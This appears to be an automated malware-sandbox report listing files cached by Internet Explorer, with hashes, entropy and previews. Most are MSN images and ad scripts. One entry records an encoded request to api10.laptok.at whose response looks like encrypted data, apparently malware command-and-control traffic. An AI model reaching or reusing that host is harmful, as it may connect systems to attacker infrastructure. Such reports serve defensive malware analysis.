Preview:	......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........6.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...)....i(.j....3...X.D.UK....@?...Hg..$......G._.Y......?..~F..I......VE.....cU.9...M.....G#5....Oz.'...e..u#=..52..kGV.#..z..._..ny....e.c.#..l.$qI.....)...$.aV.b.m.Z@jd.G..\.<..p..3N.aa.=m.E..WPjE.:U..).<P.+.A.t..l.T.......9s.\...-.i....<u..z.rHS..W.x..o5.....O.....2.d........q./Z.I.A.?.H...z.kC.86f,y./.g....JNW>...6..........q.+>3..?..\.}...H...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1dHhSJ[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 206x250, frames 3
Category:	downloaded
Size (bytes):	7289
Entropy (8bit):	7.9374002451816015
Encrypted:	false
SSDEEP:	192:xCLv/XU8uZlJbhluzlAjzotkuXrkVOfjVHm2vu6qnr00otj:ULvPUjB2xuh7oVG2/ySj
MD5:	0CC4BBA7173007E90589461E4A7179EF
SHA1:	A943E2298F1F9123D97D9D198FD61F6F62695CB0
SHA-256:	516702589A5B41C91F0D6C7C18DB3800B7CB6CF5612E88FC50572411B0FB8B45
SHA-512:	1A433E36F6FFBC6F6076F07755BA0102281B44FAAA52C36608EC0D1A1B3EF3DE402BEE5730457AF9D631DC85EA6F5A424F6CBE9DFBC15F8D351EF7F35BB85665
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHhSJ.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg&x=643&y=233
Preview:	......JFIF.....H.H.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...HX...s.-e.kuh..H.f.E.h...W.6...?.kF.....r+...7..k.<.....q.s..}.X..b.8....w.D......EDv..{...Kb.L.=)/..zT.l.@a....b.vW...V..W.....y.7%...........e5..6`.U....5(.. ~..=EK.#pV....)Q.s...=..]..u....[.h...).."...<X.].....=+........)o...4....I..H?......`..=f.M.&2.v...r_F.f.A...p........u.;gI..y.V.x..u...W'.j...h....{.T.6....~.Oz.......K.f0\|..=kn........J

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1dHqD2[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 622x368, frames 3
Category:	downloaded
Size (bytes):	28464
Entropy (8bit):	7.96093606547751
Encrypted:	false
SSDEEP:	768:7EJtcJF/KJyGBx9nkoOoge4DB0LWYgJ2Zxt1vaK8af:7EyjKJ9Bn1Oogn06Y1ZcG
MD5:	E38552C3BAD509D4FCB24C4C706E0CD5
SHA1:	2AE245AEF45186459BBDBD95BDD8F403E65D0A17
SHA-256:	AA8D1A16D3782F693F2CCE6006646D1E51E61AED1800507BC4570846C5FAE792
SHA-512:	BADE48EDB988822D445C667A964CA84F5B6B7E16AC28C40E850ABCBEF603D954951DAFE4CCF77DD88E31F5224C9D82E8FAC938276FE5177C45DEE13115F905C4
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHqD2.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..,..H....j........U4.].h.[\|.2.S-.<..V.9....).i..l.{<..H...V.B......'.7.%Y.Q.`.E0.ml.Z.......?f..0...0i.Z."...:SU...sK...[F\.8!.T........ Q..r.5..u.F%...*[hAQ._..\|db.Y..cn.<.H.M.......9...;...........JcG.q....mp.... ?..y3..?t...J..?Z.N...Ny5..{..FqKLDW.#..<....=.S=...I..Z.....>?.k.x.k9k#.....#.zb.m.8..."...QtvY.."..\....T.[195v./.qQ......-.( S`...V..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1dHqH1[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 622x368, frames 3
Category:	downloaded
Size (bytes):	16727
Entropy (8bit):	7.890731722624281
Encrypted:	false
SSDEEP:	384:7IPFhwGyK16xlANXd2j/RE9kYgo7jE/BpTZ2pK5olFh0UU:7IPwGy61Uj297gvT6KKT6UU
MD5:	AD771B594D8435B72EC3C554C8D24559
SHA1:	EF20299A044277D48BA2F7A48DAD911C9203961E
SHA-256:	3C22853E71F5E3D4E9720B982F816E98A9CFCA3283DBC850807874B376E6EBDE
SHA-512:	EF68769687686F4CE35982762F1BBDA9914CAC0A37E5CCC9B807BE61A2723588500D73EA8D634437B5AD988BD9A40B2A5BE56387AD5F2AB9650616324F290C79
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHqH1.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?........._..hV...W.....cD....K..z....?..S6..vW..I....F1...".E....d ..W5.#.z.....Ud..0.V.T.6..oP...nL.R.c.v..S-....Mm+. .%5...d..w.o..N.....J.y.~..1rw:.U.a`.%..c...S..*C0....._...u..&......EcK.i7.&.v....:........l.0[..{V.S......T.......D..].........tz1.Y...<S.W+.B9d..&.c%..c.V...(..f.u..Gr..4.;DV.Q.!'...+.^...o.U`.[..pF.9...5.k..MJ..[.!...+.}.....i._:v.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1dHsLz[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	12591
Entropy (8bit):	7.942751758062402
Encrypted:	false
SSDEEP:	384:e3evveR9Fe3y6lrnll2Rz2opUvmofaLA9:eOv+cCmrnll2hZC1h
MD5:	A19E613EE2A01161681B815588E1A4B1
SHA1:	336D67A56FB76BAEB035AEAB1401A373E4A85C63
SHA-256:	358BDE094168889AB6FED6D0E5BFB5782BACD098EFED88A75A6D36D934ED8682
SHA-512:	ADD2F1000B06DAAC98739A9733E08BD57AEEDEA7EC6AB40DB8700CE012A4C2C0E2E746CA40F772535A66DEDF76B590119B55067D23C648D647E8C9959EA8F3C8
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHsLz.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg&x=291&y=163
Preview:	......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..e.'..F1...<..P..P1:.mbq.U..MZ.`...'.'.....G.L..l..=..Q7v..F..Z..py5z!..<.I.nq...R..S"...M.y.?a......(.3.z...5wL....X...p..!G..<.N.4.5"iZi?.....L."..z.\..3..j%QD....5y.O.E..ok...7..7.'..g. ........;...[......>..S......4.7.C!.Eq.......!.C.V.6.....W...`.G...Yw........F......./=i$C...z..?...~^FEA~6...M)ltaU...c..M..="=..h...?.Q.J..V:W..E.y...U.0y..x

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1dHvHH[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	14186
Entropy (8bit):	7.959477143047502
Encrypted:	false
SSDEEP:	384:edHxnWnPFkPgL7JAh8Ikr3e3QW6QKMG298bs5zr:edHVok4Lt6soh38A5f
MD5:	83D2849669D6CED53D3D12F06F5EC8DF
SHA1:	653C48E1F00FE4F687018E252726D862B70FC738
SHA-256:	9D299D31BBC1C2CAE83CF102535C81A25773E8C75D8657E25F7AB354DACDBBE7
SHA-512:	2EA6267118E732BDC0D82BFAAF6DD96F7BEF28C256613C0ED8233CB5A6CBC0A1D5158C0BBF5C5552644A1C7CA0DF783DABDEEC6E134190DE3E1754B9A8E782E7
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHvHH.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg&x=176&y=219
Preview:	......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...........@.\o%O..E....;.#H$~Ux.A!8.o[.Z....sU.L..A..@.V....BB..+..(.!Z4...j..$Q......Z.7^U....n^..q..0..K4x.8.N.....C`n<.s.......q.....M..R..n......P.F......k..I...w.R.1...%H.G.B`..8;.QH..F....I...5.&<7..V.RI..5.....P>R..H..'o.x...kx...K}=}...X... ....-....+....Te..7L.....\|.uf.S....=..~..f..1..j.z.#...*....n...5.$k".e.............m.]..E.....g..(F6b

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1kc8s[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	799
Entropy (8bit):	7.616735751178749
Encrypted:	false
SSDEEP:	12:6v/7ee//6FAU+ZPhOPnAgOydY9vYyfS1Y+OyGo0VtgzKkcbqeGOrlkTR+a1eXGyI:QGp+Zpajd4/ObGPngzKkcOSnGLT
MD5:	2C55F358C8213245D8DE540D89B76ED0
SHA1:	413A0EA00DBB2A54C6A3933B8864E1847D795124
SHA-256:	D11901D46370D97173C94754B69E90D7540FAF1F5C571C5E521E3A062FBF0A77
SHA-512:	0385C2FE61CFFF69EE6A85D13003B4729B93132007294DF3407DAAB97318157C421940D689E01B6CE5360A57029393FEAB949A83647DF22D43DF5064E7B82DD0
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1kc8s.img?m=6&o=true&u=true&n=true&w=30&h=30
Preview:	.PNG........IHDR.............;0......sRGB.........gAMA......a.....pHYs..........o.d....IDATHK.kZQ....W.Vc.-m,...&`....`."....b...%...E2...&.R......A0......d."......>o-i....~...9...=?.!C.\{.j.bmmMR.V_.D......P(..j..Z-]..?...uV_...>.o.e.o..a.d21....\|>..mh4..J...........g..H.......;..C.R..."........J....Q.9..^.......8>??O.zo.Z.h4.N...r9...).......>R.9...Kz..W.T....J.w.3fee..a; ......+.X._]]....?q.\w.Ri.n.............p...CJ.N.Y....l:..).......d2.5..1.3d....\.s....6....nQ..Q...E..d.......l..B!2...G".H&..........ag5..ZR^..0.p.......4...\.2...6.....).........Xj.Ex.n.....&.Z.d.X..#V.b..lll..[...&''i........x....*8...w3..=.A...E..M.T..!8...Q(....L6)..r........h4..>......yj...j.9.:....f..+'._#......j..I...&.0.H4....<R...:....7.Y...n.......Z.s..2.....#A.j:s.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BBUE92F[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	708
Entropy (8bit):	7.5635226749074205
Encrypted:	false
SSDEEP:	12:6v/78/gMGkt+fwrs8vYfbooyBf1e7XKH5bp6z0w6TDy9xB0IIDtqf/bU9Fqj1yfd:XGVw9oiNH5pbPDy9xmju/AXEyfYFW
MD5:	770E05618413895818A5CE7582D88CBA
SHA1:	EF83CE65E53166056B644FFC13AF981B64C71617
SHA-256:	EEC4AB26140F5AEA299E1D5D5F0181DDC6B4AC2B2B54A7EE9E7BA6E0A4B4667D
SHA-512:	B01D7D84339D5E1B3958E82F7679AFD784CE1323938ECA7C313826A72F0E4EE92BD98691F30B735A6544543107B5F5944308764B45DB8DE06BE699CA51FF7653
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBUE92F.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs...%...%.IR$....YIDAT8OM..LA...~..."".q...X........+"q@...A...&H..H...D.6..p.X".......z.d.f......rg.?.....v7.....\.{eE..LB.rq.v.J.:tv...w.....g../.ou.]7........B..{..\|.S.......^....y......c.T.L...(.dA..9.}.....5w.N......>z.<..:.wq.-......T..w.8-.>P...Ke....!7L......I...?.mq.t....?..'.(....'j.......L<)L%........^..<..=M...rR.A4..gh...iX@co..I2....`9}...E.O.i?..j5.\|$.m..-5....Z.bl...E......'MX[.M.....s...e..7..u<L.k.@c......k..zzV....O..........e.,.5.+%.,,........!.....y;..d.mK..v.J.C..0G:w...O.N...........J....\|....b:L=...f:@6T[...F..t......x.....F.w..3....@.>.......!..bF.V..?u.b&q.......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BBVuddh[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	304
Entropy (8bit):	6.758580075536471
Encrypted:	false
SSDEEP:	6:6v/lhPkR/ChmU5nXyNbWgaviGjZ/wtDi6Xxl32inTvUI8zVp:6v/78/e5nXyNb4lueg32au/
MD5:	245557014352A5F957F8BFDA87A3E966
SHA1:	9CD29E2AB07DC1FEF64B6946E1F03BCC0A73FC5C
SHA-256:	0A33B02F27EE6CD05147D81EDAD86A3184CCAF1979CB73AD67B2434C2A4A6379
SHA-512:	686345FD8667C09F905CA732DB98D07E1D72E7ECD9FD26A0C40FEE8E8985F8378E7B2CB8AE99C071043BCB661483DBFB905D46CE40C6BE70EEF78A2BCDE94605
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........+......IDAT8O...P...3.....v..`0.}...'..."XD.`.`.5.3. ....)...a.-.............d.g.mSC.i..%.8*].}....m.$I0M..u.. ...,9.........i....X..<.y..E..M....q... ."...,5+..]..BP.5.>R....iJ.0.7.\|?.....r.\-Ca......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BBkwUr[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	431
Entropy (8bit):	7.092776502566883
Encrypted:	false
SSDEEP:	12:6v/78/kFkUgT6V0UnwQYst4azG487XqYsT:YgTA0UnwMM487XqZT
MD5:	D59ADB8423B8A56097C2AE6CBEDBEC57
SHA1:	CAFB3A8ABA2423C99C218C298C28774857BEBB46
SHA-256:	4CC08B49D22AF4993F4B43FD05DE6E1E98451A83B3C09198F58D1BAFD0B1BFC3
SHA-512:	34001CBE0731E45FB000E31E45C7D7FEE039548B3EA91EBE05156A4040FA45BC75062A0077BF15E0D5255C37FE30F5AE3D7F64FDD10386FFBB8FDB35ED8145FC
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBkwUr.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J....DIDAT8O..M.EA...sad&V l.o.b.X..........O,.+..D....8_u.N.y.$......5.E..D.......@...A.2.....!..7.X.w..H.../..W2.....".......c.Q......x+f..w.H.`...1...J.....~'.{z)fj...`I.W.M..(.!..&E..b...8.1w.U...K.O,.....1...D.C..J....a..2P.9.j.@.......4l....Kg6.....#........g....n.>.p.....Q........h1.g .qA\..A..L .\|ED...>h....#....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\TspIchn[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	339392
Entropy (8bit):	5.999967656351339
Encrypted:	false
SSDEEP:	6144:cDJl443S9YbS47Fk3Zsv12tXBQWgy01CGFSpjYC5osGAEcJMizvDupzStPX56:cB35u8u6vMFgy0cWUGlMv65oXM
MD5:	415DBB7F17A00913790F8E99ADBB9D93
SHA1:	C7D1A1B88A46A1E65B109257BFFFB5259900AF17
SHA-256:	3A7B725B6B273BFCFDBEC5A06868562AD848034EFBA247BE5739858768FC3B0A
SHA-512:	39C6EB2B71D0D68E0AEAC7DF2CCBDA743633A94895D90DC2569D866F1490A33200BEB29AC31573F2814E78487FF6FC50D492AC049213C8542ACE6BF23F24D048
Malicious:	false
IE Cache URL:	http://api10.laptok.at/api1/9a3FdV_2FOe2lNWBzywhye/a2rzbdQuOhRbh/1tMI9TP_/2FFHpcEjc2zIsj3nY_2FaRD/bbKOnK6Aw9/T9Li8ZpaG0hs_2FEE/_2B0kgl3vplN/HPMJmXJvTbm/kjHzz19HUtkaT1/4BDTN7ZVSNKtMR3H5nP4a/s8_2F3CxujepwtCo/By36bxNYadNwz_2/FEk2aSXfXLicJH7n4U/7D_2FTfi5/cc2nrD5Ag2qXRkQmnDt6/1GTWH5aoTuyoAdeDUx1/UqFEv13ML45n9P1f5D7a2h/spqio1V138YVU/_2FSoCJL/_2BPfPH_2FwmC1xDPsgb90b/lJFlQYaXBd/gV1Ci2eCEez/TspIchn
Preview:	6jOtPWjpJsKgG9IhgDi2XnSCJeSPxONX1nV8WY+GCWFWyqgjjf6aBHZ4Gm39WG35NlAjlSFMwsnGPoXAWLoM/VLRnXdPawnt6pIAayjW023ZgrADWj9Fjr/hEsQCUe4YN7RczMhFfFBSJE/eeaHpbpQOy3XXJLCECMM3JawVyKI5iDJIFdt8LR0d0hT19sg73Ioo/OjZ0sudP5iixOsSUCP++ITfM5DX+ewXXNSgm3azZl1EqLWpD9YZWm1PgJLqtij73+/eCtHQdmU+FFqUDQ3Xnpks7WjfKicoK3vhxYzfuwHE3AUCMVgzwFEzknjCe9uIblPLxqxWMU6JLDpeSTbcyxbKggkrp+O89ZEF+bScp5n9Jc1fsIkM9Ncw15Qt0YTxV/MgV22XDxC1hTWXMQuNHwUzeqTfFvh26+BNxM/PwN5yOJhezaNZpQp7q9tDSNskdDTftyq4K8ofKgCZv15zm+l5u7/Mcd5nxwUPW5WsXa7ib9QPplhF063avjRaAFWVpamPBkQP1N1SoIbNNFsgzHlH79gPaBwu3X1dEAe3blRumLGYr8OAsEwvbOVxJvLh6q753BMvZjXGdTk+9dFyubDa1jpLDtD176vNa++TwgurI3dCIbwwGkxT+S7BtkCz2UsVl8/oxv+pyVqTuFWJNBVsjmMBTH+o6ixzyxY4kCoQ14J3W6MW8QSctnAS2US5UlzBdCiE7HQNno7026e8F26RpsiAmcjtEeqQ38jAnTbDfOm/u+sBYDbOeAwpBjLG/DryeM3Qi9w7O6LujG5iaCPrVUxgHhW5/6oMR8sdtLTYSw3ERvJPdZq/pt+pOqSVnTDfixNvt8OAYhiEKwuSyGf5nQHyRruX1Tvy+NIGP/+PTpz8rcqR3pPUYDDDZA7zg4T1I/Y2vuZ1crSAZAJy6aXwJD0XSAvEzXw3OBHfnIBt14DTppquKuqVJanzB0revx3N8H8GUUIncQil4aNk4MPGk5P4qJOiPkQT

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\a8a064[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 28 x 28
Category:	downloaded
Size (bytes):	16360
Entropy (8bit):	7.019403238999426
Encrypted:	false
SSDEEP:	384:g2SEiHys4AeP/6ygbkUZp72i+ccys4AeP/6ygbkUZaoGBm:g2Tjs4Ae36kOpqi+c/s4Ae36kOaoGm
MD5:	3CC1C4952C8DC47B76BE62DC076CE3EB
SHA1:	65F5CE29BBC6E0C07C6FEC9B96884E38A14A5979
SHA-256:	10E48837F429E208A5714D7290A44CD704DD08BF4690F1ABA93C318A30C802D9
SHA-512:	5CC1E6F9DACA9CEAB56BD2ECEEB7A523272A664FE8EE4BB0ADA5AF983BA98DBA8ECF3848390DF65DA929A954AC211FF87CE4DBFDC11F5DF0C6E3FEA8A5740EF7
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Preview:	GIF89a.......dbd...........lnl.........trt..................!..NETSCAPE2.0.....!.......,..........+..I..8...`(.di.h..l.p,..(.........5H.....!.......,.........dbd...........lnl......dfd....................../..I..8...`(.di.h..l..e.....Q... ..-.3...r...!.......,.........dbd..............tvt...........................*P.I..8...`(.di.h.v.....A<.. ......pH,.A..!.......,.........dbd........\|~\|......trt...ljl.........dfd......................................................B`%.di.h..l.p,.t]S......^..hD..F. .L..tJ.Z..l.080y..ag+...b.H...!.......,.........dbd.............ljl.............dfd........lnl..............................................B.$.di.h..l.p.'J#............9..Eq.l:..tJ......E.B...#.....N...!.......,.........dbd...........tvt.....ljl.......dfd.........\|~\|.............................................D.$.di.h..l.NC.....C...0..)Q..t...L:..tJ.....T..%...@.UH...z.n.....!.......,.........dbd..............lnl.........ljl......dfd...........trt...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\e151e5[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 1 x 1
Category:	downloaded
Size (bytes):	43
Entropy (8bit):	3.122191481864228
Encrypted:	false
SSDEEP:	3:CUTxls/1h/:7lU/
MD5:	F8614595FBA50D96389708A4135776E4
SHA1:	D456164972B508172CEE9D1CC06D1EA35CA15C21
SHA-256:	7122DE322879A654121EA250AEAC94BD9993F914909F786C98988ADBD0A25D5D
SHA-512:	299A7712B27C726C681E42A8246F8116205133DBE15D549F8419049DF3FCFDAB143E9A29212A2615F73E31A1EF34D1F6CE0EC093ECEAD037083FA40A075819D2
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Preview:	GIF89a.............!.......,...........D..;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\fcmain[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	38376
Entropy (8bit):	5.066252643555933
Encrypted:	false
SSDEEP:	768:P1avn4u3hPPXW94h8zpEMv/YXf9wOBEZn3SQN3GFl295ok6elGjBQ6elyska:dQn4uRHWmh8zmMv/YXf9wOBEZn3SQN3X
MD5:	49E3474775215A51371E367C126F9019
SHA1:	CF5F7BFA8269CC48FECDFD090F21EAC2DE919F89
SHA-256:	B76068D72395ACEA32BA01DA392E2B5F7548DCFEE41BD2399C8C6EE2DC421335
SHA-512:	E06E55EA0C1C4F19617216BBD90BBE5CFD9F5DB1A7D955404FC234F64A6DE27D566478955FE8AAED01B8E8A3278F1F9CC994217D9519E88B458E421AE9C6812B
Malicious:	false
IE Cache URL:	https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3D%3D&crid=722878611&size=306x271&cc=CH&https=1&vif=2&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&nse=5&vi=1613420770406645614&ugd=4&rtbs=1&nb=1&cb=window._mNDetails.initAd
Preview:	;window._mNDetails.initAd({"vi":"1613420770406645614","s":{"_mNL2":{"size":"306x271","viComp":"1613420418996354933","hideAdUnitABP":true,"abpl":"3","custHt":"","setL3100":"1"},"lhp":{"l2wsip":"2887305235","l2ac":"","sethcsd":"set!N7\|983"},"_mNe":{"pid":"8PO641UYD","requrl":"https://www.msn.com/de-ch/?ocid=iehp#mnetcrid=722878611#"},"_md":[],"ac":{"content":"<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN\" \"http:\/\/www.w3.org\/TR\/html4\/loose.dtd\">\r\n<html xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\r\n<head><meta http-equiv=\"x-dns-prefetch-control\" content=\"on\"><style type=\"text\/css\">body{background-color: transparent;}<\/style><meta name=\"tids\" content=\"a='800072941' b='803767816' c='msn.com' d='entity type'\" \/><script type=\"text\/javascript\">try{window.locHash = (parent._mNDetails && parent._mNDetails.getLocHash && parent._mNDetails.getLocHash(\"722878611\",\"1613420770406645614\")) \|\| (parent._mNDetails[\"locHash\"] && paren

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\fcmain[2].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	38874
Entropy (8bit):	5.051913931467512
Encrypted:	false
SSDEEP:	768:p1av44u3hPPxW94hWGa7ExEuaYXf9wOBEZn3SQN3GFl295o2/8lAbA/r/8lA/sZ3:7Q44uRhWmhJaoxEuaYXf9wOBEZn3SQND
MD5:	5422169F2532AF7A6AB1A7E7A47A845D
SHA1:	A95093FE1000E3CD26ED718B5D9977F930D16460
SHA-256:	23DDE90088FF386A38825FB403E99DFE70AC6A40293EC8142F4F0CB9DC937F77
SHA-512:	C54015A07068E087D3E62171165CE0E14E0E2286F3A5BE90DC67528FAAB55FB57093091234F9736659D7DF20EFFDB3B4A14B0B5E6DBAAB3B8B27B865656B1C87
Malicious:	false
IE Cache URL:	https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3D%3D&crid=858412214&size=306x271&cc=CH&https=1&vif=2&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&nse=5&vi=1613420770839298944&ugd=4&rtbs=1&nb=1&cb=window._mNDetails.initAd
